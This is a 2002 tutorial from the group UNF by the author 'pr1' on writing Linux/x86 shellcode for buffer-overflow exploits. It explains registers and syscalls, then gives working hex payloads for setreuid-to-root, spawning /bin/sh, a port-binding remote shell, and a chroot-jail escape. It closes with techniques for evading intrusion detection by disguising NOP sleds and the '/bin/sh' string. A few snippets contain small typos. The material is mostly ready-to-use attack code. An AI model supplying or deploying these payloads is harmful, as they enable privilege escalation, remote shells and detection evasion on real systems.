UNF && pr1 present: Writing Linux/x86 shellcodes for dum dums.
        	  
        	  
-----------------------------------------------------------------------------------------------
Copyright (c) February 2002, Sebastian Hegenbart (a.k.a pr1) and UNF (United Net Frontier)
The following material is property of UNF && pr1.
Do not redistribute this article modified and give proper credit to UNF and pr1 if you 
redistribute it or if you write your own article based upon the following material.
-----------------------------------------------------------------------------------------------

1. Introduction

There are quite a few good texts about writing shellcodes out there. Unfortunately
some of them require a lot of assembler knowledge. In this text I'll try to introduce 
you in Linux/x86 assembler as well as writing shellcode for Linux/x86.
This introduction to ASM won't be complete though. I will just cover some important
parts in writing shellcode. And try to do a good job in explaining the used codes. 
Nothing can replace a good ASM book or respectively a disassembler ;)


1.2. What is shellcode?

Shellcode simply is a bunch of CPU instructions. It's called shellcode because the first 
shellcodes did simply spawn a shell. This term is obsolete actually ;) because there are 
remote shellcodes (UDP as well as TCP), chroot breaking codes, codes that
attach a line to a file, setreuid codes and much more ...
I'm going to call it shellcode throughout the text because everybody does. 


1.3. What do we need shellcode for?

After taking over a process (hopefully suid|sgid|deamon run by root...) we usually want 
it to do something usefull. There are lots of techniques like return into libc,GOT overwrite
addys,PLT infection,exploiting .dtors ... 
If you can't get any other function doing your mighy work ( overwriting func pointers, ... ) 
you maybe want to use a shellcode. Simply overwrite %eip with some buffer address, jump back 
into a bunch of NOPs and your CPU will fetch instructions from the overwritten %eip forth. 
If you did a good job in writing this exploit your input buffer will be filled with shellcode
somewhere. If %eip reaches the start of your shellcode it will be executed and you win!



1.4 How do I write shellcode?
 
 Ok let's start the main part of this article.  I assume that you have at least some C knowledge.

 
=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=
2. Assembler:
 
 Asm is a low level programming language. It's so damn low level that your able to set some 
 transistors in your CPU. A IA-32 CPU works with several registers. Accessing those registers
 is much faster than accessing memory directly. You tell your program what do you via 
 filling those registers with values. 
 The most important registers to know are:  %eax,%ebx,%ecx,%edx,%esp,%esi,%eip,%edi
 All registers of a 32 bit CPU are 4 bytes long.
 These names might sound like there was some uncreative developer doing his work but
 that's wrong:
 
 # %eax is the accumulator register after switching to kernel mode (int $0x80) the kernel checks
   for the Syscall number (every function provided by our kernel has its own syscall number).
   Look for this numbers in /usr/include/asm/unistd.h.
   
 # %ebx is the base register. Our first argument to a function should be placed inside this 
   register.
   
 # %ecx the second argument.
 
 # %edx the third.
 
 # %esp is the stack frame pointer and points to the top of the current stack frame.
  
 # %ebp is the stack base pointer it points to the bottom of the current stack frame.
 
 # %eip is the instruction pointer (our best friend in relation with buffer overflows)
   Note that there does not exist an instruction to modify these register (beside of a jmp).
   
# %eip and %edi are the segment registers (use them to store user data in your shellcode)
 
 
2.1 Modifying register:
 
 There are a lot of commands dealing with modification of registers.
 You can modify a byte, a word or the whole register.
 This is done with a suffix appended to an instruction.
 
 e.g.: movl,movb,movw (long,byte,word)
 
 
# mov ... the mov instruction helps you to move something into a register (an addy,some number,
  another register's content...). In AT&T syntax (the syntax I'm using troughout the text) the 
  destination is the second, the source the first register.
  
# inc,dec ... increments or decrements the content of a register

# sub,add ... adds/subtracts something to/from the content of a register

# xor ... This is a bit operation (beside not,or,and,xor and the negations). 

  Xor plays a special role when dealing with shellcodes.
  some basic explanation of the xor operation is due yet:

  xoring 1 with 0 is: 1, 0 with 0 is: 0, 1 with 1 is: 0
  thus xor 4,4 is 0 (100 xor 100 == 000);
  Note: xor is returning the difference between two numbers and is also used to determine the
  hamming distance of a code. This is used in coding theory and encryption.
  
  
# leal ... (stands for load effective address long) with this instruction you can load a memory 
  address into a register 
  
# int $0x80 thats an interrupt. To keep it simple it just switches to kernel mode and lets the 
  kernel execute our function.
  
# push,pop ... load or save something from|on the stack

  
Note: You can access the lower or higher byte of the lower word of a register (%al,%ah), the
lower word of a register (%ax) or the whole (extended) register (%eax). There is no way to
access the higher word of a register.
Registers can be accessed byte-wise (%al,%bh,...), word-wise (%ax,%bx,...) and a
whole (%eax,%ebx,...)
  
 
Prepared with this knowledge we can start writing some asm code and later some shellcode.


Let's start with a Hello, world ;) (there was no way avoiding it)

.data
message:
.string "Hello, world\n"

.globl main
main:

# write(int fd,char *message,ssize_t size);

movl $0x4,%eax     # Syscall number 4 from /usr/include/asm/unistd.h into %eax
movl $0x1,%ebx     # The standart output file descriptor (stdout)
movl $message,%ecx # the addy of our message into %ecx
movl $0xc,%edx     # the length ouf our message

#exit(int returncode);

movl $0x1,%eax # Syscall number 1
xorl %ebx,%ebx  # set %ebx zero
inr $0x80

Note: This piece of code wouldn't work as shellcode for two reasons:
1. It's not address independent ( due to declaration of a .data field )
2. It's containing zeros which terminate usuall string operating functions.


Don't panic! I'll explain the whole procedure of making the shellcode now ;)


=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=

3. Writing shellcode:


3.1 Setreuid shellcode:

We will start with a small and easy piece, a setreuid(0,0) shellcode.
We need a setreuid or a seteuid shellcode if the program droppes privileges before
the vulnerable function executes ( usually with a seteuid(getuid()) ).


The C program would look like:

#include <stdio.h>

main(void) {

setreuid(0,0);
exit(0);
}

 
080483b0 <main>:
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx
 80483bf:       cd 80                   int     $0x80
 80483c1:       8d 76 00                lea     0x0(%esi),%esi
 80483c4:       90                      nop    
 80483c5:       90                      nop    
 80483c6:       90                      nop    
 80483c7:       90                      nop    
 80483c8:       90                      nop    
 80483c9:       90                      nop    
 80483ca:       90                      nop    
 80483cb:       90                      nop    
 80483cc:       90                      nop    
 80483cd:       90                      nop    
 80483ce:       90                      nop    
 80483cf:       90                      nop    


That's the whole main function generated by our compiler. But we only need the setreuid piece:
 
 
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx
 80483bf:       cd 80                   int    $0x80
             

Thus the setreuid shellcode would be:

    "\xb8\x46\x00\x00\x00"
    "\xbb\x00\x00\x00\x00" 
    "\xb9\x00\x00\x00\x00" 
    "\xcd\x80" 
    
    
If you go through this shellcode you will notice that there are more NULL bytes ( \x00 ) 
than instructions in this code. Unfortunately we can't use any NULL containing shellcodes.
That's because most of the time we will be exploiting C programs. But there is no datatype
string in C. There is only a 1 byte (char *) pointer pointing to a byte in memory.
A NULL represents the end of the string. 
String operating functions like strcpy,strcat will stop copying the string after
reaching the first NULL because they think they have reached its end which is indicated
via NULL. 

Thus only "\xb8\x46\" from our setreuid shellcode would be copied when trying to exploit a 
program. 


What we have to do now is ro rewrite our assembly code in that there are no NULL - bytes
in our shellcode left.

As you can see this are the NULL containing functions:

 
 80483b0:       b8 46 00 00 00          movl    $0x46,%eax
 80483b5:       bb 00 00 00 00          movl    $0x0,%ebx
 80483ba:       b9 00 00 00 00          movl    $0x0,%ecx


We have to find equivalent instructions which do not produce any NULL - bytes:

80483b0:       b8 46 00 00 00          movl    $0x46,%eax

This immediate function encodes into [opcode|destination][4 byte immediate value].
Because our immediate value is only 0x46 and the operation type long the other
bytes remain unused.

We substitued this with:

 80483c6:       31 c0                   xorl    %eax,%eax
 80483c8:       b0 46                   movb    $0x46,%al
 
The xorl sets %eax to zero. This is needed because we can't be sure that %eax is emtpy 
when we change the lower 8 bit. If %ah was filled with some value the kernel would 
execute the wrong syscall if we don't zero the register out in advance. 

The movb instruction encodes into [opcode|register][1 byte immediate value].
We can encode values up to 255 with 1 byte in 2-komplement.


 
Again our logical equivalent NULL free setreuid piece:

               
 80483b0:       31 c0                   xorl    %eax,%eax
 80483b2:       31 db                   xorl    %ebx,%ebx
 80483b4:       31 c9                   xorl    %ecx,%ecx
 80483b6:       b0 46                   movb    $0x46,%al
 80483b8:       cd 80                   int    $0x80


And our working shellcode:

	"\x31\xc0"
	"\x31\xdb"
	"\x31\xdb"
	"\xb0\x46"
	"\xcd\x80"


Beside of being NULL free a good shellcode should also be as small as possible. The smaller
the shellcode the more NOPs can be placed in the exploit buffer thus increasing the chances
of guessing the correct return address.
 

3.2 Making your shellcode portable: 

You will probably not now much about a remote system. Or you wont have enough privileges to
find out a lot about the remote system. Or you maybe do not even have access to the remote
system yet. A few reasons not to write shellcodes fitting only one system.  
Your shellcodes should be portable. Thus no absolute addressing may be used when writing 
shellcodes. Chances are minimal that your needed data will be at the correct address.
Shellcodes should generally be written using relative addresses.

e.g: we do not write: jmp 0x80483b8 instead we write: jmp $0x1a

 
3.3 Shell spawning shellcode:


Spawning a shell in C looks like:

#include <stdio.h>

main(void) {
char *name[2];

name[0]="/bin/sh";
name[1]=NULL;

execve(name[0],name,NULL);
}


As you can see, we need a character string ( "/bin/sh" ) to let execve know what we want
to execute. But we have to fetch the address of "/bin/sh" somehow in a way we can 
refere to it relatively. 



If you have some knowledge about the Intel architecture and CPU architecture in generall you
know that the memory location of the next instruction to be executed is stored in %eip often
called pc or program counter. If a program calls a sub-function the address of the next 
instruction to be executed after the sub-function's return must be stored somewhere. 

Relating to some Risc CPUs this address can be stored in a register like:

jal addy,reg /* jumps to addy and stores pc+4 in reg */
jr reg       /* the return of our sub-function jumps to the addy stored in reg */


For our Intel Cisc:

call sub_func /* jumps to sub_func and pushes %eip+4 onto the stack */
ret           /* after stack was cleaned the function jumps to the saved address lying on 
	         the stack */


We can say that the address of the next instruction is pushed onto the stack by call. 

Thus we can apply a little trick:

call some_offset    /* call pushes the address of "/bin/sh" ( pc+4 ) onto the stack */
.string "/bin/sh"


Note that the string "/bin/sh" lies in the .text ( or code ) segment. Our CPU can't execute 
"/bin/sh" thus we have to avoid that our CPU actually executes this piece of code.

Let's look at a complete example of fetching an address and avoiding the execution of "/bin/sh".

.globl main
main:

jmp to_call
after_jmp:

popl %esi  /* addy is now in %esi */

/* exit */
xorl %eax,%eax
incl %eax
int $0x80

to_call:
call offset 
.string "/bin/sh" 


We jmp to the call let call doing the work, call back, pop the address from the stack and exit.

static char lnx_execve[]=

"\xeb\x1d"                  // jmp     0x1d  /* gather "/bin/sh" addy */
"\x5b"                      // popl    %ebx  /* poping "/bin/sh" addy */
"\x31\xc0"                  // xorl    %eax,%eax   
"\x89\x5b\x08"              // movl    %ebx,0x8(%ebx) /* copy address into %ebx at offset 0x8 */
"\x88\x43\x07"              // movb    %al,0x7(%ebx)  /* NULL terminate the string */
"\x89\x43\x0c"              // movl    %eax,0xc(%ebx) /* NULL terminate the arguments */
"\x8d\x4b\x08"              // leal    0x8(%ebx),%ecx /* loads %ecx with "/bin/sh" addy */
"\x8d\x53\x0c"              // leal    0xc(%ebx),%edx /* loads NULL into %edx */
"\xb0\x0b"                  // movb    $0xb,%al       /* execve syscall */
"\xcd\x80"                  // int     $0x80 		
"\x31\xc0"                  // xorl    %eax,%eax	  /* and exit to avoid an infinite loop */
"\x21\xd8"                  // andl    %ebx,%eax
"\x40"                      // incl    %eax
"\xcd\x80"                  // int     $0x80
"\xe8\xde\xff\xff\xff"      // call    -0xde
"/bin/sh";


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

4.0 More Advanced Shellcodes:


Considering remote exploits we need other kinds of shellcodes. We can't just spawn a shell 
remotely. Thus our shellcode needs network capabilities. To bind a shell onto a port 
we can write:


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>


main(void) {
	char *exec[2];
	int fd,fd2;
	struct sockaddr_in addy;
		
	
	addy.sin_addr.s_addr = INADDR_ANY;
	addy.sin_port = htons(1337);
	addy.sin_family = AF_INET;
	
	exec[0]="/bin/sh";
	exec[1]="sh";
	
	fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	
	bind(fd,&addy,sizeof(struct sockaddr_in));
	listen(fd,1);
	
	
		fd2 = accept(fd,NULL,0);
		
		dup2(fd2,0);
		dup2(fd2,1);
		dup2(fd2,2);
		
		execl(exec[0],exec,NULL);
	}



A quite easy task in C. Now let's try the same thing in assembler.


4.1. Socket Syscalls:

Usually the syscall number is moved into %eax and the arguments into the following registers.
After using the kernel interrupt our work is done. 
Functions exist with  more arguments than registers to store your Arguments in thus simply
store your arguments in user memory and save the address of this memory in a register. 

Refering to socket syscalls ( socket, bind, listen, accept,... ) it's slightly different.
Every socket call has the syscall number 0x66. So how does the kernel know which syscall was 
meant? This is done via a subcode in %ebx. 


Some important subcodes are:

socket()   1
bind()     2
listen()   4
accept()   5

Check <linux/net.h> for more. 


4.2. Struct Sockaddr_in:

We also have to take a look at struct sockaddr_in:


struct sockaddr_in {
  
  uint8_t sin_len; /* length of the structure, this is 0x10 for AF_INET (ipv4). 2 byte */
 
  sa_family_t sin_family; /* 2 byte containing AF_INET (defined as 2)*/
 
  in_port_t sin_port;    /* 2 byte with the TCP or UDP port number in network byte order */ 
 
  struct in_addr sin_addr /* 4 byte, usually contains the servers addy but we want to bind
  						 * our own addy and thus zero it out (same as INADDR_ANY) */
  char sin_zero[8];       /* should be zeroed out as well */
};



4.3. Port binding shellcode:


static char bind[]=

/* socket(int domain, int type, int protocol); */

"\x31\xc0"                    //   xorl    %eax,%eax
"\x89\x46\x10"                //   movl    %eax, 0x10(%esi)   /* 3rd Argument IPPROTO_TCP */
"\x40"                        //   incl    %eax
"\x89\xc3"                    //   movl    %eax, %ebx
"\x89\x46\x0c"                //   movl    %eax, 0xc(%esi)    /* 2nd Argument SOCK_STREAM */
"\x40"                        //   incl    %eax
"\x89\x46\x08"                //   movl    %eax, 0x8(%esi)    /* 1st Argument AF_INET */
"\x8d\x4e\x08"                //   leal    0x8(%esi), %ecx
"\xb0\x66"                    //   movb    $0x66, %al
"\xcd\x80"                    //   int     $0x80

/* listen(int fd, int backlog); */

"\x43"                        //   incl    %ebx 
"\x88\x46\x04"                //   movb    %al,0x4(%esi)      /* save fd returned from socket */
"\x31\xc0"                    //   xorl    %eax,%eax
"\xc6\x46\x0c\x10"            //   movb    $0x10,0xc(%esi)    /* sockaddr_in length */
"\x66\x89\x5e\x10"            //   movb    %bx,0x10(%esi)     /* AF_INET */
"\x89\x46\x14"                //   movl    %eax,0x14(%esi)    /* INADDR_ANY */
"\x89\xc2"                    //   movl    %eax,%edx         
"\xb0\x90"                    //   movw    $0x90,%al          /* sin_port */
"\x66\x89\x46\x12"            //   movb    %ax,0x12(%esi)     
"\x8d\x4e\x10"                //   leal    0x10(%esi),%ecx    /* load structure int %ecx */
"\x89\x4e\x08"                //   movl    %ecx,0x8(%esi)     /* save struct at offset 0x8 */
"\x8d\x4e\x04"                //   leal    0x4(%esi),%ecx     /* load struct together with fd into %ecx */
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* bind(int fd, struct sockaddr_in *my_addy, socklen_t addrlen); */

"\x89\x5e\x08"                //   movl    %ebx,0x8(%esi) 
"\x43"                        //   incl    %ebx
"\x43"                        //   incl    %ebx 
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* accept(int fd, struct sockaddr_in *addy, socklen_t *addrlen); */

"\x89\x56\x08"                //   movl    %edx,0x8(%esi)     /* addy is a NULL pointer */
"\x89\x56\x0c"                //   movl    %edx,0xc(%esi)     /* so is addrlen */
"\x43"                        //   incl    %ebx
"\xb0\x66"                    //   movb    $0x66,%al
"\xcd\x80"                    //   int     $0x80

/* dup2(int old, int new) */

"\x86\xc3"                    //   xchg    %al,%bl            /* fd returned from accept is first arg */
"\x31\xc9"                    //   xorl    %ecx,%ecx          /* stdin */
"\xb0\x3f"                    //   movb    $0x3f,%al     
"\xcd\x80"                    //   int     $0x80

"\x41"                        //   incl    %ecx               /* stdout */
"\xb0\x3f"                    //   movb    $0x3f,%al
"\xcd\x80"                    //   int     $0x80

"\x41"                        //   incl    %ecx               /* stderr */
"\xb0\x3f"                    //   movb    $0x3f,%al
"\xcd\x80"                    //   int     $0x80

   
/* execve(cons char *filename, char *const argv[], char *const envp[]); */

"\xeb\x1d"                    //   jmp     0x1d  /* gather "/bin/sh" addy */
"\x5b"                        //   popl    %ebx  /* poping "/bin/sh" addy */
"\x31\xc0"                    //   xorl    %eax,%eax
"\x89\x5b\x08"                //   movl    %ebx,0x8(%ebx) /* copy address into %ebx at offset 0x8 */
"\x88\x43\x07"                //   movb    %al,0x7(%ebx)  /* NULL terminate the string */
"\x89\x43\x0c"                //   movl    %eax,0xc(%ebx) /* NULL terminate the arguments */
"\x8d\x4b\x08"                //   leal    0x8(%ebx),%ecx /* loads %ecx with "/bin/sh" addy */
"\x8d\x53\x0c"                //   leal    0xc(%ebx),%edx
"\xb0\x0b"                    //   movb    $0xb,%al       /* execve syscall */
"\xcd\x80"                    //   int     $0x80
"\x31\xc0"                    //   xorl    %eax,%eax
"\x21\xd8"                    //   andl    %ebx,%eax
"\x40"                        //   incl    %eax 
"\xcd\x80"                    //   int     $0x80
"\xe8\xde\xff\xff\xff"        //   call    -0xde
"/bin/sh";



Note: This shellcode is quite bloated. It could be optimized further especially the execve part
( that's our original execve code ). I didn't optimize it further for better readability. It's 
only purpose is to show the principals of writing portbind shellcode.


=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=
5. Chroot breaking shellcode:

Note: On linux the chroot behaviour changed somewhere between kernel 2.4.6 and 2.4.13.
This method works only on kernels <= 2.4.5.

Sometimes deamons like ftps,httpd,... run in a so called change-root jail.
This simply means that your home directory is changed to the path = "/"
Hence your homedir is / (note that this is not the real root) you can't perform a cd ..
and do mighty things with your account as well as your not able to spawn a shell because
/home/pr1/bin/sh does not really exist ( if we consider /home/pr1 to be chrooted ).
Unfortunately to computer security you can break this jail.

This is a quite easy task:

* create another directory
* chroot this directory
* do a chroot("../../../"); with many "../"


Our chroot breaking C proggy:

#include <unistd.h>

main(void) {
	mkdir("pr1",0755);
	chroot("pr1");
	chroot("../../../../../../../../../../");
}


Note: We create a directory called "sh" in assembler. We can use the string we need to execute
the shell as our directory name. In that we can reduce our shellcodes size and simplify 
the code. ;)


static char chroot[]=
"\xeb\x4e"                       // jmp     0x4e

/* mkdir(); */
"\x31\xc0"                       //  xorl    %eax,%eax 
"\x5e"                           //  popl    %esi            /* addy of /bin/sh now in %esi */
"\x8d\x5e\x05"                   //  leal    0x5(%esi),%ebx  /* load addy of sh into %ebx */
"\x66\xb9\xed\x01"               //  movw    $0x1ed,%cx      /* that's the 0755 mode flag */
"\xb0\x27"                       //  movb    $0x27,%al       /* mkdir syscall */
"\xcd\x80"                       //  int     $0x80

/* chroot(); */
"\x31\xc0"                       //  xorl    %eax,%eax 
"\xb0\x3d"                       //  movb    $0x3d,%al    /* chroot syscall, sh still in %ebx */
"\xcd\x80"                       //  int     $0x80

/* chroot("../"); */
"\x31\xc0"                       //  xorl    %eax,%eax
"\xbb\xd2\xd1\xd1\xff"           //  movl    $0xffd0d1d1,%ebx 
"\xf7\xdb"                       //  negl    %ebx

/* We put "../" into %ebx.
*  "../" encodes into "\x2e\x2e\x2f" intel is little endian and we thus have to put 
*  "\x2f\x2e\x2e" into the register. Thus we put 0xffd0d1d1 into %ebx and perform a not
*  on this value. This results in our wished "\x2f\x2e\x2e". 
*/


"\x31\xc9"                       //  xorl    %ecx,%ecx
"\xb1\x10"                       //  movb    $0x10,%cl    /* we loop for 16 times */
"\x56"                           //  pushl   %esi /* save "/bin/sh" string

/* Set the segment register. We start at 0x10(%esi) */

"\x01\xce"                       //  addl    %ecx,%esi 

"\x89\x1e"                       //  movl    %ebx,(%esi) /* and write to pointed addy */
"\x83\xc6\x03"                   //  addl    %0x3,%esi   /* increment segment register */
"\xe0\xf9"                       //  loopne  -0x7      
"\x5e"                           //  popl    %esi        /* restore "/bin/sh" string */
"\xb0\x3d"                       //  movb    $0x3d,%al   /* chroot syscall */
"\x8d\x5e\x10"                   //  leal    0x10(%esi),%ebx /* this is our evil ../../.. string */
"\xcd\x80"                       //  int     $0x80

/* execve */
"\x31\xc0"                       //  xorl    %eax,%eax
"\x89\x76\x08"                   //  movl    %esi,0x8(%esi)
"\x89\x46\x0c"                   //  movl    %eax,0xc(%esi)
"\xb0\x0b"                       //  movb    $0xb,%al
"\x89\xf3"                       //  movl    %esi,%ebx
"\x8d\x4e\x08"                   //  leal    0x8(%esi),%ecx
"\x8d\x56\x0c"                   //  leal    0xc(%esi),%edx
"\xcd\x80"                       //  int     $0x80

/* exit */
"\x31\xc0"                       // xorl    %eax,%eax 
"\x21\xd8"                       // andl    %ebx,%eax
"\x40"                           // incl    %eax 
"\xcd\x80"                       // int     $0x80
"\xe8\xad\xff\xff\xff"           // call -0xad
"/bin/sh";


Note: This "not" trick is from TaeHo's chroot shellcode. 


=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=
6. IDS-evasive Codes:

Simple Intrusion Decections Systems try identify an exploit attempt via counting numbers of
NOP or NOP like instructions in received packets. ( if you do not know what a NOP is: it's 
an instruction that does nothing at all, this is used in exploits to maximize chances of 
guessing correct buffer addresses. If you hit a nop the code will proceed until it reaches
your mighty shellcode. ) 
This techniques can be fooled however:


One of the first ideas to fool this were to use a 1 byte jump:
\x90 ( nop ) is substituted with "\xeb\x01" ( jmp 0x1 )


Another way is to use other nop-like instructions like 
incl %eax,incl %ebx,incl %ecx,incl %edx: 

coded as: \x40,\x43,\x41,\x42 
You can of course mix them up as well.


Another nice way would be something like:
movl $0x41414141,%eax

coded as: \xb8\x41\x41\x41\x41 
Let's say you hint into a \x41 -> the cpu will increment %ecx until it reaches the \xb8
further on %eax will be loaded with 0x41414141

You could mix this instruction with a
movl $0x43434343,%ebx 

coded as: \xbb\x43\x43\x43\x43 this would have the same result.




6.1. Hiding the "/bin/sh" string:

Another way of identifying an exploit attempt might be searching for a string like "/bin/sh".
This technique is also applieable for let's say an imapd exploit. Or generally a program
that casts all lowercase characters into uppercase: 



#include <stdio.h>

main(int argc,char *argv[]) {
	
	char buf[512];
	int i;
	
	for(i=0;i<strlen(argv[1]);i++) {
		argv[1][i] = toupper( argv[1][i] );
		}
		printf("%s\n",argv[1]);
}


Our general shell spawning shellcode is: 

"\xeb\x1d"                  // jmp     0x1d
"\x5b"                      // popl    %ebx
"\x31\xc0"                  // xorl    %eax,%eax
"\x89\x5b\x08"              // movl    %ebx,0x8(%ebx)
"\x88\x43\x07"              // movb    %al,0x7(%ebx)
"\x89\x43\x0c"              // movl    %eax,0xc(%ebx)
"\x8d\x4b\x08"              // leal    0x8(%ebx),%ecx
"\x8d\x53\x0c"              // leal    0xc(%ebx),%edx
"\xb0\x0b"                  // movb    $0xb,%al
"\xcd\x80"                  // int     $0x80
"\x31\xc0"                  // xorl    %eax,%eax
"\x21\xd8"                  // andl    %ebx,%eax
"\x40"                      // incl    %eax
"\xcd\x80"                  // int     $0x80
"\xe8\xde\xff\xff\xff"      // call    -0xde
"/bin/sh";


Small characters are between \x61 (a) and \x7a (z).

Our shellcode does not contain any lowercase characters unless the "/bin/sh" string.
The "/bin/sh" string in hex looks like: \x2f\x62\x69\x6e\x2f\x73\x68
So if we subtract 20 from all lowercase characters in this string it looks like: 
"\x2f\x42\x49\x4e\x2f\x53\x48". 
But we have to change this value otherwise we are about to execute "\x2f\x42\x49\x4e\x2f\x53\x28" 
instead of "/bin/sh". This is done via adding $0x20 to "bin" and to "shell". Due to the fact
that "/" is no character we can leave them unchanged. 


static char hide[]=
"\xeb\x31"               //     jmp    0x31
"\x5b"                   //     popl   %ebx
"\x80\x43\x01\x20"       //     addb   $0x20,0x1(%ebx)   <- we simply add 0x20 to our string
"\x80\x43\x02\x20"       //     addb   $0x20,0x2(%ebx)
"\x80\x43\x03\x20"       //     addb   $0x20,0x3(%ebx)
"\x80\x43\x05\x20"       //     addb   $0x20,0x5(%ebx)
"\x80\x43\x06\x20"       //     addb   $0x20,0x6(%ebx)
"\x31\xc0"               //     xorl   %eax,%eax
"\x89\x5b\x08"           //     movl   %ebx,0x8(%ebx)
"\x88\x43\x07"           //     movb   %al,0x7(%ebx)
"\x89\x43\x0c"           //     movl   %eax,0xc(%ebx)
"\x8d\x4b\x08"           //     leal   0x8(%ebx),%ecx
"\x8d\x53\x0c"           //     leal   0xc(%ebx),%edx
"\xb0\x0b"               //     movb   $0xb,%al
"\xcd\x80"               //     int    $0x80
"\x31\xc0"               //     xorl   %eax,%eax
"\x21\xd8"               //     andl   %ebx,%eax
"\x40"                   //     incl   %eax
"\xcd\x80"               //     int    $0x80
"\xe8\xca\xff\xff\xff"   //     call  -0xca
"\x2f\x42\x49\x4e\x2f\x53\x48";  // our hidden /bin/sh string


If you have any instructions containing a lowercase character in your shellcode substitute 
this instruction with some other logical equivalent one. 


=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=
7. Post word: 

Armed with this knowledge you should now be able to write your own shellcode
I hope you enjoyed reading this paper otherwise sorry for waisting your time.
Feel free to mail me <pr10n@u-n-f.com>


Written by pr1 ( pr10n@u-n-f.com ).


greets to: teso, usf and thc

-----------------------------------------------------------------------------------------------
\x00
-----------------------------------------------------------------------------------------------